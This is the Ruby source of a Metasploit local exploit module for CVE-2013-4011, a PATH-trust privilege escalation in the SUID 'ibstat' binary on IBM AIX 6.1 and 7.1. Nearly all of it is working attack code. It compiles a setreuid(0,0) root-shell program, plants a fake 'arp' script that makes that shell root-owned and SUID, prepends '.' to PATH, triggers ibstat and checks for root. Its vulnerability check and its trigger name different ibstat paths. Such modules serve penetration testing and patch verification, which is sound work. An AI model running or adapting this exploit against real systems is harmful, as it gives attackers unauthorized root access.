151 lines
4.9 KiB
Ruby
151 lines
4.9 KiB
Ruby
|
# Not sure if the deps are correct
|
||
|
|
||
|
require 'msf/core'
|
||
|
require 'rex'
|
||
|
|
||
|
class Metasploit4 < Msf::Exploit::Local
|
||
|
Rank = ExcellentRanking
|
||
|
|
||
|
def initialize(info={})
|
||
|
super( update_info( info, {
|
||
|
'Name' => 'ibstat $PATH Privilege Escalation',
|
||
|
'Description' => %q{
|
||
|
This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
|
||
|
},
|
||
|
'Author' =>
|
||
|
[
|
||
|
'Kristian Erik Hermansen', #original author
|
||
|
'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
|
||
|
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
|
||
|
],
|
||
|
'References' =>
|
||
|
[
|
||
|
[ 'CVE', '2013-4011' ],
|
||
|
[ 'OSVDB', '95420' ],
|
||
|
[ 'BID', '61287' ],
|
||
|
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
|
||
|
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
|
||
|
],
|
||
|
'Platform' => [ 'aix' ],
|
||
|
'Arch' => [ 'ppc' ],
|
||
|
'Targets' =>
|
||
|
[
|
||
|
[
|
||
|
'IBM AIX Version 6.1',
|
||
|
{
|
||
|
'Arch' => 'ppc',
|
||
|
'Platform' => 'aix',
|
||
|
'AIX' => '6.1',
|
||
|
}
|
||
|
],
|
||
|
|
||
|
[
|
||
|
'IBM AIX Version 7.1',
|
||
|
{
|
||
|
'Arch' => 'ppc',
|
||
|
'Platform' => 'aix',
|
||
|
'AIX' => '7.1',
|
||
|
}
|
||
|
],
|
||
|
|
||
|
],
|
||
|
'DefaultTarget' => 1,
|
||
|
}
|
||
|
))
|
||
|
register_options([
|
||
|
OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
|
||
|
], self.class)
|
||
|
end
|
||
|
|
||
|
def exploit
|
||
|
|
||
|
if not is_vuln()
|
||
|
return
|
||
|
end
|
||
|
|
||
|
root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
|
||
|
arp_file = "#{datastore["WritableDir"]}/arp"
|
||
|
|
||
|
if (is_gcc_installed == true)
|
||
|
write_c_file("#{root_file}")
|
||
|
print_status("Compiling source...")
|
||
|
cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
|
||
|
print_status("Compilation completed")
|
||
|
print_status("Deleting source...")
|
||
|
cmd_exec "rm #{root_file}.c"
|
||
|
else
|
||
|
cmd_exec "cp /bin/sh " + "#{root_file}"
|
||
|
end
|
||
|
print_status("Writing custom arp file...")
|
||
|
write_arp_file("#{arp_file}","#{root_file}")
|
||
|
print_status("Custom arp file written")
|
||
|
print_status("Updating PATH environment variable...")
|
||
|
cmd_exec 'PATH=.:$PATH'
|
||
|
cmd_exec 'export PATH'
|
||
|
print_status("Triggering vulnerablity...")
|
||
|
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||
|
print_status("Removing custom arp...")
|
||
|
cmd_exec "rm #{arp_file}"
|
||
|
print_status("Checking root privileges...")
|
||
|
verify_root("#{root_file}")
|
||
|
end
|
||
|
|
||
|
def is_gcc_installed
|
||
|
print_status("Checking if gcc exists...")
|
||
|
gcc_version = cmd_exec 'gcc -v'
|
||
|
gcc_array = gcc_version.split("\n")
|
||
|
gcc_array.each do |res|
|
||
|
if res.include? ("gcc version")
|
||
|
print_good("gcc found! " + "(" + "#{res}" + ")")
|
||
|
return true
|
||
|
end
|
||
|
end
|
||
|
print_status("gcc not found. Using /bin/sh from local system")
|
||
|
return false;
|
||
|
end
|
||
|
|
||
|
def write_c_file(filename)
|
||
|
c_file = filename + ".c"
|
||
|
print_status("Dropping file " + c_file + "...")
|
||
|
cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
|
||
|
cmd_exec "echo \"int main()\" >> " + c_file
|
||
|
cmd_exec "echo \"{\" >> " + c_file
|
||
|
cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
|
||
|
cmd_exec "echo \"setregid(0,0);\" >> " + c_file
|
||
|
cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
|
||
|
cmd_exec "echo \"return 0;\" >> " + c_file
|
||
|
cmd_exec "echo \"}\" >> " + c_file
|
||
|
end
|
||
|
|
||
|
def write_arp_file(arp_file, bin_file)
|
||
|
cmd_exec "echo \"#!/bin/sh\" > " + arp_file
|
||
|
cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
|
||
|
cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
|
||
|
cmd_exec "chmod 0555 " + arp_file
|
||
|
end
|
||
|
|
||
|
def verify_root(filename)
|
||
|
cmd_exec filename
|
||
|
id_output = cmd_exec "id"
|
||
|
if id_output.include? ("euid=0(root)")
|
||
|
print_good("Got root! (euid)")
|
||
|
elsif id_output.include?("uid=0(root)")
|
||
|
print_good("Got root!")
|
||
|
else
|
||
|
print_status("Exploit failed")
|
||
|
end
|
||
|
end
|
||
|
|
||
|
def is_vuln()
|
||
|
ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
|
||
|
if ls_output.include? ("-r-sr-xr-x")
|
||
|
print_good("Target is vulnerable")
|
||
|
return true
|
||
|
else
|
||
|
print_status("Target is not vulnerable")
|
||
|
return false
|
||
|
end
|
||
|
end
|
||
|
end
|
||
|
|